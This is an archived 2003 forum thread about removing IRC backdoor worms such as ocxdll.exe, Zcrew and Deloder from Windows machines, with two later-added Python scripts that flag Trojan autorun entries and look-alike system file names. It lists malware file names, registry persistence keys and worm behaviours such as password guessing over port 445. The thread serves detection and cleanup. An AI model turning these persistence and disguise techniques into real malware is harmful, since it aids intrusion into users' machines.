I just got hit by a variant of this virus. Not sure how, as this is a pretty clean machine. It may have been when I installed quicktime?

Anyway, I've removed Winclock from the registry, but it's still running mirc and UPDATE when it starts.

I'd rather not completely reinstall. Can someone summarize procedures for this variant?

Are there any freeware virus utilities anymore?

Kyle Lai
klai@klcconsulting.net
01/31/03
For people who reported the infection was related to Quicktime installation, can you share your installation process?

Thanks,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc
www.klcconsulting.net

Bob
toplinedesign@hotmail.com
02/04/03
Just curious if anyone else has run into the same problems I have getting rid of this taskmngr.exe virus. First let me say thanks to everyone who has posted here; all your info was a great help. But every time I rebooted, the same two infected files kept showing back up, taskmngr.exe and win32hp.exe, even though I could not locate these files anywhere on my system nor in any registry entry. My virus software showed that they were in the windows/system32/netbios.exe/ directory, but there was no such directory. I just happened to stumble across this file, which is not a directory at all but a file named netbi0s.exe (with a zero, not an o, in the name). Once I scanned this file it showed that these two infected files were actually hidden within this file. Once deleted, the infected files did not reappear on my next virus scan.

Just thought I would put my 2 cents worth in.

Bob

Kyle Lai
klai@klcconsulting.net
02/04/03
Hi Bob,
If possible, please send the netbi0s.exe file (in a zip file if possible) to me at kyle@kylelai.com. I am interested in taking a look at it.

Please tell us what OS you are using. If it's XP, you have to disable the system restore mode during the virus removal process, otherwise, every time you reboot, XP will restore your deleted files, possibly including viruses you removed.

To disable the system restore in XP, follow the direction from Symantec: http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc
www.klcconsulting.net

Kris
kris@studio135.fslife.co.uk
02/16/03
Great work!

I didn't realise I had this until I tried to uninstall a few old programs to try and speed my system up. Eventually Win2k didn't boot up at all and I had a box asking if I wanted help connecting with mIRC. Not knowing what it was, I clicked no.

I had mIRC twice in the Uninstall Programs box, which it wouldn't let me uninstall as it was running. I couldn't find it in the task manager so I did a web search, found this site, and here was a reference to HideMyPornoExe, which I frequently saw on bootup but couldn't find!!

A lot of these files were found in my C:\windows\fonts directory if that helps.

I installed ZoneAlarm 10 minutes ago, and over 1700 intrusions have already been blocked, about 200 being "high rated"

Many thanks

Kyle Lai
klai@klcconsulting.net
02/16/03
FYI, based on the Symantec anti-virus website, there have been some new variants, and it seems like they have been getting wild out there.

I haven't seen the actual virus/worm/Trojan file; so if you have the file, please send it to me at kyle@kylelai.com for analysis.

This time it deceived victims by using the "explorer.exe" installed by this worm/Trojan. The REAL Windows explorer is located at "winnt\explorer.exe", but this Trojan installs its own explorer.exe at "%system%", which is usually "winnt\system32\explorer.exe."

Here is a list of files from this variant according to Symantec (http://securityresponse.symantec.com/avcenter/venc/data/backdoor.irc.zcrew.html). File names have been completely changed, and might have new functionalities.

1. Create the following files in the %System% folder:
Bootdrv.dll *
Explore.dat
Explore.exe
Explorer.exe *
Iiscache.dll
Libparse.exe
Moo.dll *
Navdb.dbx
Psexec.exe *
Rcfg.ini
Rconnect.con
Rconnect.exe *
Secure.bat
Str.vxd
Svchost32.exe *
V32driver.bat
Web.swf *

2. Create the folder, %System%\www, in which it creates these files:
Mdx.dll *
Moo.dll *
Views.mdx *

It also creates the registry value:

ccreg %system%\explorer.exe

in the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net
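Kyle's two indicators above, an explorer.exe launched from %System% instead of %WinDir% and the Zcrew file names, can be checked mechanically against a `reg export` of the Run keys. This is an added example, not code from the thread, KLC Consulting or Symantec; it parses .reg text (the sample export is constructed, mixing two legitimate values seen earlier in the thread with two Trojan values) and assumes %WinDir% is C:\WINNT.

```python
r"""Audit autorun values in a Windows registry export (.reg text).

Added example for this thread, not code from the forum, KLC Consulting or
Symantec. It flags the patterns Kyle describes for Backdoor.IRC.Zcrew:
a Run value that launches explorer.exe from anywhere other than
%WinDir%\explorer.exe, anything started out of %System%\www, and any file
name on Symantec's Zcrew list. The .reg sample at the bottom is constructed.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "key name data reason")

# Keys this thread keeps coming back to (RunServices shows up in later posts).
AUTORUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runservices",
}

# File names from the Symantec Backdoor.IRC.Zcrew list quoted in the thread.
ZCREW_FILES = {
    "bootdrv.dll", "explore.dat", "explore.exe", "iiscache.dll", "libparse.exe",
    "moo.dll", "navdb.dbx", "psexec.exe", "rcfg.ini", "rconnect.con",
    "rconnect.exe", "secure.bat", "str.vxd", "svchost32.exe", "v32driver.bat",
    "web.swf", "mdx.dll", "views.mdx",
}

def parse_reg_export(text):
    """Yield (key, value_name, data) for each REG_SZ value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and "=" in line:
            name, _, data = line.partition("=")
            name = "@" if name == "@" else name.strip('"')
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                # .reg escapes backslashes and quotes inside string data.
                yield key, name, re.sub(r'\\(["\\])', r"\1", data[1:-1])

def expand(path, win_dir):
    """Expand the %System% / %WinDir% / %SystemRoot% placeholders used in the thread."""
    system = win_dir + r"\system32"
    out = path
    for token, value in (("%system%", system), ("%windir%", win_dir),
                         ("%systemroot%", win_dir)):
        out = re.sub(re.escape(token), lambda _m: value, out, flags=re.IGNORECASE)
    return out

def command_exe(command):
    """Return the executable path from an autorun command line, dropping arguments."""
    if command.startswith('"'):
        return command.split('"')[1]
    return command.split(" ")[0]

def audit_autoruns(reg_text, win_dir=r"C:\WINNT"):
    """Return Finding tuples for suspicious values under the autorun keys."""
    findings = []
    legit_explorer = (win_dir + r"\explorer.exe").lower()
    for key, name, data in parse_reg_export(reg_text):
        if key.lower() not in AUTORUN_KEYS:
            continue
        exe = command_exe(expand(data, win_dir)).lower()
        base = exe.rsplit("\\", 1)[-1]
        if base == "explorer.exe" and exe != legit_explorer:
            reason = "explorer.exe launched from outside %WinDir%"
        elif base in ZCREW_FILES:
            reason = "file name on the Zcrew list"
        elif "\\system32\\www\\" in exe:
            reason = "runs from %System%\\www"
        else:
            continue
        findings.append(Finding(key, name, data, reason))
    return findings

# Constructed sample export: two legitimate values (Synchronization Manager and
# the RealPlayer updater from an earlier post) and two values from the Trojan.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Synchronization Manager"="mobsync.exe /logon"
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\evntsvc.exe\" -osboot"
"ccreg"="%System%\\explorer.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"RunDLL34"="C:\\WINNT\\system32\\svchost32.exe"
'''

if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_REG):
        print(f"{f.name!r} -> {f.data}: {f.reason}")
```

On a live Windows 2000 box the input would come from `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg`; the check only says where to look, the file itself still has to be examined.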

arkk
arkk@concentric.net
02/18/03
I have just discovered a "PSEXESVC.EXE" virus/trojan on my computer. So far suspected files are:

PSEXESVC.EXE (60KB)
dire.exe (16KB)
newexplor.exe (16KB)
ratsou.exe (16KB)
tbbspu.exe (16KB)

Seems to be a variation of an IRC trojan/virus. If anybody has any information or suggestions on cleaning/removal - please share :)

Chris

02/18/03
servudaemon.exe - Entry Point Not Found
Is there anyone who can help to explain this:-

"Servudaemon.exe - Entry Point Not Found"
"The procedure entry point SymGetLineFromAddr could not be located in the dynamic link library IMAGEHELP.dll"

My guess is that I have been attacked by a virus that I can't recognise.

Kyle Lai
klai@klcconsulting.net
02/19/03
Hi Chris,
Yes. Servudaemon.exe indicates that you have been hit by a virus/Trojan, which indeed has owned your system, and installed a ServU FTP server on your system, and possibly tried to use your system to share some files. Usually these viruses try to set up FTP services for file sharing on IRC. Systems that are on high bandwidth networks (T1/T3 or above) are more likely to get attacked.

Since you are having some error messages, maybe you are OK because the ServU FTP server couldn't be started properly on your system.

Try to run anti-virus and anti-Trojan software on your system to detect and remove this virus. Also, try to use the software described in the 9/24/2002 posting to help you secure your system(s).

Good luck,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Harvey Jacobs
harveyjacobs@nf.sympatico.ca
02/22/03
I got this trojan on my server, but mIRC was never installed on any computer in my office, so how else did I get this trojan?

If you can tell me how I got it, please e-mail me. Thanks, harveyjacobs@nf.sympatico.ca

Kyle Lai
klai@klcconsulting.net
02/24/03
Harvey,
If you get this worm/Trojan, that means your server is not secure. Your server had a weak administrator password.

I am not sure if you have a firewall on your network. If not, you will certainly get this worm/Trojan because it is very wild on the Internet. If you do have a firewall, make sure you close port 445 because that's what this Trojan uses.

Hope this helps,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Eric

02/25/03
Hi all.

Thanks to all who give invaluable information here.

I believe I found 2 variants of this trojan from 2 Win2k machines in my office.

== the 1st variant ==
The original file is
- run32dll.exe

It expands itself to the following files:
- 32dllemu.txt
- blah1.gif
- cygwin1.dll
- firedaemon.exe
- msnmngr.exe
- pulist.exe
- services1.bat
- ServUStartUpLog.txt
- software.config
- tar.exe
- winlog.exe

This one will create a private ftp server on the victim machine...

== the 2nd variant ==
The original file is
- netmon32.exe

It expands itself to the following files:
- dpd.bat (script to brute force trying uid/passwd guessing)
- kabomon (reset security settings)
- kill.exe (killing a windows program)
- mnt32.exe (hide the window of a program)
- mnt32.scr (a list for picking random uid for mIRC)
- nt16.ini (IRC script?)
- nt32.ini (IRC script?)
- psexec.exe (execute a program remotely)
- start.bmp (?)
- twunk_16.exe (mIRC client)
- winhelper.exe (launching an application)
- winlogo.bmp (?)

I am not very familiar with analysing those scripts. Therefore, I don't know what this trojan is doing besides changing the security settings...

Kyle, do you want to have a copy of the trojan?

Thanks all again for the discussion..

Eric

Kyle Lai
klai@klcconsulting.net
02/25/03
Eric,
Sure, can you please send the worm/Trojan package files to my kyle@kylelai.com account?

run32dll.exe and netmon32.exe.

Thanks,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

jay

02/28/03
Hello and thanks for all the great info. I too had many of the infected files listed; however, I am continually getting a message from AVG regarding an infected SECURE.BAT file, and although I've deleted it, it somehow keeps coming back. There is also a folder in system32 called www that keeps appearing even when deleted, which I am quite certain is linked to the secure.bat file. Has anyone else had this problem? Perhaps it's totally unrelated to the ocxdll.exe problem.. I'm not sure. Please help
nicholas
spikeyhairedude@hotmail.com
02/28/03
Hey, anyone here know where I can get the source code of the Windows Task Manager?
kyle

03/01/03
Hey, I get that hidemypornoexe window popup whenever I restart the computer, but I have gotten rid of the mirc virus and all of that and I don't or can't find those suspicious registry entries. What do I do?
Kyle Lai
klai@klcconsulting.net
03/02/03
Every operating system behaves differently. Without the information on the operating system, it is not easy to determine the problem.

Please state your operating system and maybe I can give you my 2 cents.

/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

rach

03/05/03
thanks for the advice about the irc trojan. The anti-trojan program I used only detected one of the files ncp.exe and didn't solve the problem. But isolating the files you mentioned above and restarting (which stops taskmngr.exe) solved the hide window error! symptom and hopefully the trojan overall.

Thanks

LOL

03/07/03
Wow,
lots of typing
Kyle Lai
klai@klcconsulting.net
03/08/03
There has been another outbreak of a variant of mIRC worm, aka Worm.Win32.Randon.

--
Files in Worm.Win32.Randon Trojan variant - source: viruslist.com
http://www.viruslist.com/eng/viruslist.html?id=59741
--

- Deta.exe - HideWindows utility (Win32 exe file)
- fControl.a - an IRC script (port scanning and infection of remote computers)
- IfCOntrol.a - an IRC script (IRC-channels flooding and DDoS attacks (pinging different addresses))
- incs.bat - BATCH file (LAN resources password cracker)
- Libparse.exe is "PrcView" utility (Win32 EXE file)
- psexec.exe is "PsExec" utility (Win32 EXE file)
- rcfg.ini - IRC INI file (loading other scripts)
- rconnect.conf - configuration file
- reader.w - list of nicknames used by worm to establish connection with IRC-channels
- Sa.exe - TrojanDownloader.Win32.Apher
- scontrol.a - helper IRC script.
- sencs.bat - BAT file (this file is transferred to the remote computer to perform TrojanDownloader execution)
- systrey.exe - renamed mIRC client (Win32 EXE file).

This is similar to the original mIRC worm/Trojan ocxdll.exe with more guessable users and passwords.

Be careful out there. Make sure you have strong passwords, and make sure ports 445 & 139 are blocked on your firewall. A strong password is far more important though.

Good luck!
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

joiee
ronan@vandrer.dk
03/08/03
gt bot etc. etc.
when I run swatit it detects:
C:\winnt\system32\svchost32.exe -GT Bot M HideWindow
I click "clean all" and up comes the message:
"Cannot create file c:\autoexec.bat."

Someone please tell me how to get rid of this thing?
- joiee

Kyle Lai
klai@klcconsulting.net
03/09/03
joiee,

Best way to do this is to rename the file.

Rename "svchost32.exe" to "a.txt", then delete the file.

Good luck,
/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

nklo
nklo@yahoo.com
03/10/03
Kyle Lai,

According to your message on 02/16/03, does that mean that deleting all the files you mentioned can help me clean up the Trojan horse virus? My AVG Anti-Virus system told me that the file "svchost32.exe" and other exe files in my PC are infected.

joiee
ronan@vandrer.dk
03/10/03
Hi Kyle,
- thanks for the advice.
I can find -svchost32.- using Norton.
But can I delete this file?
It's not a system file?

joiee
denmark

Kyle Lai
klai@klcconsulting.net
03/10/03
nklo/Joiee,

svchost32.exe is involved in many variants because most of the people will think this file is a system file... However, the real system file is called "svchost.exe"... clever...

One mIRC Trojan variant (TROJ_FLOOD.BI.D/IRC_ZCREW) is spreading wildly now, and one of its files is "svchost32.exe." I suspect that you might be infected with this worm/Trojan. Please check http://www.klcconsulting.net/mirc_virus_analysis.htm

The best defense as I always mention, is to set STRONG PASSWORDS for all of your user accounts.

On 3/8/2003, I did an experiment to see how fast a Windows 2000 Professional system (honeypot), having the "administrator" userID with no password, can get infected with worms/Trojans on the Internet. I put the honeypot on a cable modem for 5 hours, and I was infected with 2 IRC-type worms/Trojans within this time. If you are interested in the result of this experiment, the report will be available on 3/11/2003 on the KLC Consulting website, http://www.klcconsulting.net/irc_experiment1.htm

The Internet is a dangerous place if you don't properly secure yourself for it. Make sure you have strong passwords for all accounts you have! That's the least you should do.

Good luck!
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net
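Kyle's point that svchost32.exe trades on the real svchost.exe, like netbi0s.exe and taskmngr.exe earlier in the thread, can be turned into a name check that runs over a process or directory listing. This is an added example, not code from the thread or KLC Consulting; the list of protected system names and the sample process paths are constructed, and it goes slightly beyond the posts by also catching a rearranged name such as run32dll.exe against rundll32.exe.

```python
"""Flag executable names that imitate Windows system binaries.

Added example for this thread, not code from the forum or KLC Consulting.
It covers the naming tricks the posts describe: a digit tacked onto a real
name (svchost32.exe vs svchost.exe), a letter added or dropped (taskmngr.exe
vs taskmgr.exe), a digit standing in for a letter (netbi0s.exe), and, going a
little beyond the posts, the same characters rearranged (run32dll.exe vs
rundll32.exe). The list of protected names is an assumption for the example.
"""

# Real Windows 2000 binaries the thread's Trojans imitated, plus a few other
# process names a user would not question in Task Manager.
SYSTEM_BINARIES = (
    "csrss.exe", "explorer.exe", "lsass.exe", "mobsync.exe", "rundll32.exe",
    "services.exe", "spoolsv.exe", "svchost.exe", "taskmgr.exe", "winlogon.exe",
)

# Digits commonly used to stand in for letters, as in netbi0s.exe.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

def levenshtein(a, b):
    """Edit distance between two short strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_of(path):
    """Return (system_name, reason) when the file name imitates a system binary.

    Exact matches return None: a real svchost.exe is judged by its location and
    hash, not by its name. Only .exe names are examined.
    """
    name = path.lower().rsplit("\\", 1)[-1]
    if name in SYSTEM_BINARIES:
        return None
    stem, dot, ext = name.rpartition(".")
    if not dot or ext != "exe":
        return None
    deglyphed = stem.translate(HOMOGLYPHS)                   # netbi0s -> netbios
    dedigited = "".join(c for c in stem if not c.isdigit())  # svchost32 -> svchost
    for legit in SYSTEM_BINARIES:
        lstem = legit[:-4]
        if deglyphed == lstem:
            return legit, "digit used as letter"
        if dedigited == lstem:
            return legit, "digits added to system name"
        if len(lstem) >= 6 and levenshtein(stem, lstem) == 1:
            return legit, "one edit from system name"
        if sorted(stem) == sorted(lstem):
            return legit, "same characters rearranged"
    return None

# Constructed sample process list mixing names from the thread with real ones.
SAMPLE_PROCESSES = [
    r"C:\WINNT\system32\svchost.exe",
    r"C:\WINNT\system32\svchost32.exe",
    r"C:\WINNT\system32\taskmngr.exe",
    r"C:\WINNT\system32\run32dll.exe",
    r"C:\WINNT\system32\expl0rer.exe",
    r"C:\WINNT\system32\winclock.exe",
]

def scan(paths):
    """Map each suspicious path to the (legit_name, reason) it imitates."""
    return {p: hit for p in paths if (hit := lookalike_of(p))}

if __name__ == "__main__":
    for p, (legit, why) in scan(SAMPLE_PROCESSES).items():
        print(f"{p}: looks like {legit} ({why})")
```

A name like winclock.exe (from chris's post) passes this check, which is the point: a name test only catches impostors, everything else still needs the path and anti-virus checks Kyle recommends.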

Coree

03/11/03
Strange Brew - Win2000 pw, trojans and dialers
I purchased a (used) computer from someone recently, and naturally, the first thing I did was get to cleaning house! =o)

Some of the things I've encountered thus far are:
- After several successful boot-ups, my Admin password was changed (remotely?) and I couldn't access the system at all. I had to use some creative programming and some 'white hat' hack-ware to recover it.
- Adware deleted almost 200 files right out of the gate!
- I found 'paradise.exe' on the system, but, SwatIt has yet to identify it (or its components) as a threat.
- Zone Alarm keeps notifying me of access attempts on ports 1026 and various others. (In the past 30 minutes alone, ZA has blocked 5 access attempts).

My questions are as follows:
1) I have NO idea how to change my admin pw back to what it was! *grin* Any help? I'm currently accessing my PC using the VERY unsafe default.
2) If SwatIt is not recognising paradise.exe, does anyone have any suggestions for removal?
3) How can I determine if ZA is finding legitimate threats or just regular network traffic? Thus far, it had blocked all access attempts.

Thanks in advance for your help!

Coree

Eric

03/11/03
A related CERT Advisory was released recently concerning this trojan/worm...

http://www.cert.org/advisories/CA-2003-08.html

Zoe
zoe@solien.com
03/14/03
This site has a few suggestions:
http://www.petri.co.il/forgot_administrator_password.htm

Also, try searching for information on a parallel installation of Windows 2000 to recover the administrator password. My boss did this on one of our servers and it worked.

Kyle Lai
klai@klcconsulting.net
03/14/03
Coree,
If you don't have much stuff on the computer you just purchased, you probably should wipe it clean (FDISK), and then re-build the system. You are welcome to use the 1/23/2003 posting as a guide to build and secure your system.

In terms of recovering a Windows 2000/XP password, it can be done relatively easily; it's off topic for this thread, but send me an email and we can discuss this in more detail.

Regards,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Kyle Lai
klai@klcconsulting.net
03/18/03
Deloder worm/Trojan hit hard last week...

The Deloder worm is also an IRC-based worm, and it has similar characteristics to the original taskmngr.exe/ocxdll.exe, but it uploads a VNC server component, which allows the worm/Trojan owner to remotely control the compromised systems.

I published a detailed Deloder worm/Trojan analysis on 3/11/03, and it is available at http://www.klcconsulting.net/deloder_worm.htm

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/19/03
Dear Kyle,
Thanks for providing good suggestions.
Please clarify the following for me:
1. My laptop is infected with viruses; my NAV has detected that
D:\WINNT\System32\Dvldr32.exe
is infected with the W32.HLLW.Deloder virus.
Unable to repair this file.
But later, after I performed a full scan, it showed nothing infected. How can I avoid this in future?
2. I have found an inst.exe file in the location
D:\Winnt\System32\inst.exe and it looks like it is disabled. Can I delete this file?? Is this not a system file?? If I delete it, will there be any problem??
3. Whenever I start my OS, I notice a small mIRC icon is displayed on my taskbar as well as on the screen. From the Task Manager I found 'syscnfg.exe' is performing this.
But when I searched my drive, I found only one file, i.e., dated when I installed mIRC. But by going to the registry at location
HKey_local_machine//software//microsoft//windows//CurrentVersion//Run
I found 2 entries with 'syscnfg.exe'. One with Microsoft and the other with MSCORE.
I suspect the second one is the Trojan, so shall I delete the entire entry??
Please reply soon. Thanks in advance.
Kyle Lai
klai@klcconsulting.net
03/19/03
Joe,

I think you probably haven't run the anti-virus and anti-Trojan software with the latest definitions; otherwise it would also have detected all Deloder files and "syscnfg.exe". "syscnfg.exe" is another variant of the mIRC worm/Trojan.

As stated in the "removal instruction" and "recommendation for protections" sections in my analysis (http://www.klcconsulting.net/deloder_worm.htm) , follow the steps and you will remove "syscnfg.exe" all together when you run the anti-virus and anti-Trojan, as well as protecting yourself for future attacks.

As to your questions:
1. Follow the steps in my deloder analysis.
2. inst.exe only ran once to expand the files inside it, then it activated the backdoors to run. So, yes, you should delete inst.exe.
3. Yes, delete the entry, and then run Anti-Trojan/Anti-virus software with the latest definition.

XP systems:
As I have mentioned in my prior messages, if you have XP, disable the "system recovery" mode, do the virus scan, then reboot your system, and re-enable the automatic recovery. The instructions for disabling/enabling system recovery are on the Symantec website:
http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

tom
scorpio232@hotmail.com
03/20/03
can you get a password to the account of a high level player on runescape plz someone just stole my account just send it to my e-mail at scorpio232@hotmail.com
Joe

03/20/03
Dear Kyle,
1. I have updated with the latest virus definitions and scanned with NAV. It detected an IRC Trojan at this location,
D:\Winnt\Fonts\Font2\msinv.dll, and said 'unable to repair'. But I didn't find this dll at that location.
2. I scanned with anti-trojan s/w and it said 'Trojan may have infected this file':
D:\Winnt\msapps\dir\shell32.exe
The action I performed is 'Rename the file name'. Is it correct to do this? Will it affect anything? Other than this file it detected nothing.
3. And I had deleted 'syscnfg.exe' from the registry and deleted 'inst.exe'. But still, after rebooting, I found the mIRC icon displaying on the task bar as well as on the screen. I wonder how it appeared again. It's the same 'syscnfg.exe' performing this.
Kindly advise how to overcome all these things.
Thanks in advance.
Kyle Lai
klai@klcconsulting.net
03/24/03
Joe,
What is the operating system?

/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/25/03
Dear Kyle,
Actually I have a partition in my system. On the C drive I have Win XP Home and on the D drive I have Win2000. These things are all happening when I log in to Win2000.
A couple of days back I noticed that when I start the Win2000 OS, a small dialog appears on the screen along with the mIRC icon, with an OK button, 'Project 1' as heading and 'File not found 53' and 'Run time error' as the message. From the Task Manager I found 'clt.exe' is performing this. It is in this location:
D:\\Winnt\msapps\dir\clt.exe.
Please clarify this point for me too.
Thanks.
Kyle Lai
klai@klcconsulting.net
03/25/03
Hi Joe,
If you are comfortable looking at the registry, look into the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
and see if you find any association with "clt.exe".

Also, check "startup" folder in all of the subfolders under "[drive]\documents and settings\" and look at the properties of the shortcuts and see if anyone of them point to "clt.exe". If they do, delete them.

Let us know how it goes.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/25/03
Dear Kyle,
Yes, in the registry I found it with the name 'MSKCES32' and value D:\\Winnt\msapps\dir\clt.exe.
At this location I noticed the file was created on 12/15/2002. But I have been getting this problem only since 1 week ago. Do you still advise me to delete it from the registry?? Other than this location I didn't find it anywhere.
Thanks.
Matt

03/26/03
Kyle
Like others, we're having problems with the HideMyPornoExe popup window after reboots in Win2K. I did what you suggested and cleaned out the registry, but I'm still seeing popup windows after reboot. Any suggestions?

Thanks.

Kyle Lai
klai@klcconsulting.net
03/27/03
Joe/Matt:

Joe: Yes, deleting it should resolve your problem.

Matt:
Did you run through the 4 programs mentioned in 9/24/2002? If you haven't, please go through them and give us an update.

Cheers,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/28/03
Dear Kyle,
After deleting it from the registry, the dialog box problem on boot-up is solved. But still the mIRC icon is getting displayed on the screen as well as on the task bar. 'syscnfg.exe' is performing this. But I deleted this from the registry when I noticed there were 2 values, as explained on 03/19/03. Now only one entry with the name 'Microsoft Value' and value 'D:\Winnt\Fonts\Font2\syscnfg.exe' exists in the registry. Please advise.
Thanks.
Joe

03/28/03
Hey Kyle,
In the registry,
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
I found the variant 'RunDLL34' with value 'D:\Winnt\Fonts\Font2\syscnfg.exe'. I think only this is performing the mIRC icon on boot-up; shall I delete it??
Kyle Lai
klai@klcconsulting.net
03/29/03
Hi Joe,

Yes, deleting that registry value should help. Can you please rename the file syscnfg.exe to syscnfg.txt, zip that file and send it to me at kyle@kylelai.com?

Also, use Windows Explorer and go to the d:\winnt\fonts\ directory and use the search function by right-clicking on the "fonts" directory and selecting "search"; do a search of *.* in this directory, and you should see the "font2" directory. Deleting this directory should remove the virus completely.

Good luck,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Joe

03/30/03
Hi Kyle,
I have deleted it from the registry and deleted the 'Font2' folder too. On booting I didn't find the mIRC icon, but I found messages saying 'cannot find syscnfg.exe file make sure path is correct..libraries not available' and 'could not load or run syscnfg.exe.Make sure the file exists in computer or remove reference to the registry'.
In the registry in various locations I found syscnfg.exe. For example:
HKEY_USERS\S-1-5-21-57989841-1078145449-1957994488-1002\Software\Microsoft\WindowsNT\CurrentVersion\Windows. At this location, with name 'run' and value 'D:\Winnt\Fonts\Font2\syscnfg.exe'.
And HKEY_CurrentUser\Software\Microsoft\InternetExplorer\Explorer Bars\..\FilenamesMRU.
Here with name '000' and value 'syscnfg.exe'.
So, suggest me a solution to get rid of this.
Dan
daniel10@ireland.com
04/01/03
sscfbtn
Please Help,

My computer is constantly freezing, and when I press C + A + D I get the message sscfbtn (not responding) or Spool32 (not responding). I press End Task and get the dreaded blue screen. I have to switch off then on again every time.
Can anybody help me?

Kyle Lai
klai@klcconsulting.net
04/10/03
Dan,
Not sure if that's related to Trojans or viruses, but try to use the anti-virus and anti-Trojan software from the 9/24/2002 posting and see if you can find anything.

If not, then try to defrag your hard drive... maybe that will help a bit.

If not, then there might be some conflicts between software, maybe on some dll's... If it seriously irritates you, then you might want to re-install the OS.

Good luck,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Kyle Lai
klai@klcconsulting.net
04/13/03
There are increasing port 445 activities, and these are most likely the IRC related worms and Trojans. (http://www.incidents.org)

ocxdll.exe, Deloder worms, and several other IRC worm variants are getting worse, and sadly, it is a trend for the virus writers because it's effective, and many home users still leave their computers unsecured. Many new worms and Trojans come with a password list. The password lists for guessing administrator accounts are growing, which means if you have weak passwords, these worms will most likely get into your systems. A sample of these passwords can be found at http://www.klcconsulting.net/mirc_virus_analysis.htm and http://www.klcconsulting.net/deloder_worm.htm

Be certain to secure your systems with anti-virus, anti-Trojan, and firewall software. The posting from 9/24 has links to free utilities that you can use to secure your systems. By securing your system, you can prevent many viruses, worms and Trojans from entering your systems.

Best luck to all,
/Kyle

Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net



© Copyright 1998-2004 Newbie dot Org -- All rights reserved --


